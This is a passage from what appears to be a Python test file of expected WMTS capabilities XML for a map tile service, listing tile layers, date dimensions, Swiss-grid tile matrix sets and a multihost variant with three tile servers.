</ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n 
<ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n 
<TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n 
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n 
</TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n\n MULTIHOST_CAPABILITIES = (\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:ServiceIdentification>\n <ows:Title>Some title</ows:Title>\n <ows:Abstract>Some abstract</ows:Abstract>\n <ows:Keywords>\n <ows:Keyword>some</ows:Keyword>\n <ows:Keyword>keywords</ows:Keyword>\n </ows:Keywords>\n <ows:ServiceType>OGC WMTS</ows:ServiceType>\n <ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>\n <ows:Fees>None</ows:Fees>\n <ows:AccessConstraint>None</ows:AccessConstraint>\n </ows:ServiceIdentification>\n <ows:ServiceProvider>\n <ows:ProviderName>The provider name</ows:ProviderName>\n <ows:ProviderSite>The provider URL</ows:ProviderSite>\n <ows:ServiceContact>\n <ows:IndividualName>The contact name</ows:IndividualName>\n <ows:PositionName>The position name</ows:PositionName>\n <ows:ContactInfo>\n <ows:Phone>\n <ows:Voice>\\+41 11 222 33 44</ows:Voice>\n <ows:Facsimile>\\+41 11 222 33 44</ows:Facsimile>\n </ows:Phone>\n <ows:Address>\n <ows:DeliveryPoint>Address delivery</ows:DeliveryPoint>\n <ows:City>Berne</ows:City>\n <ows:AdministrativeArea>BE</ows:AdministrativeArea>\n <ows:PostalCode>3000</ows:PostalCode>\n <ows:Country>Switzerland</ows:Country>\n <ows:ElectronicMailAddress>[email protected]</ows:ElectronicMailAddress>\n </ows:Address>\n </ows:ContactInfo>\n </ows:ServiceContact>\n </ows:ServiceProvider>\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts2/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts3/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n 
template=\"http://wmts2/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n 
</TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n 
<Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts2/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n 
